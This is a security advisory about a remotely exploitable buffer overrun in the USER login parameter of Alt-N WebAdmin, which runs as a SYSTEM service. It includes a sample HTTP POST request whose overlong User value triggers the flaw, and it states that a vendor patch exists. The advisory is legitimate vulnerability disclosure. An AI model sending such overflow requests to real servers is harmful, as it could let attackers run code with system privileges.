|
Brought to you by:
Suppliers of:
|
|
|
| |
| WebAdmin allows administrators to securely manage MDaemon, RelayFax, and WorldClient from anywhere in the world. There is a remotely exploitable buffer overrun in the USER parameter. |
| |
Credit:
The information has been provided by Mark Litchfield.
|
| |
By default the webadmin.exe process is started as a system service. Any code being passed to the server by an attacker as a result of this buffer overrun would therefore (based on a default install) execute with system privileges.
POST /WebAdmin.dll?View=Logon HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*
Referer: http://ngssoftware.com:1000/
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: MyUser Agent
Host: NGSSoftware.com
Content-Length: 74
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: User=NGSSOFTWARE; Lang=en; Theme=Standard
User=LONGSTRING&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In
Fix Information:
NGSSoftware alerted ALTN to theses issues on the 19th of June 2003. A patch has now been made available from ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe
|
|
|
|
|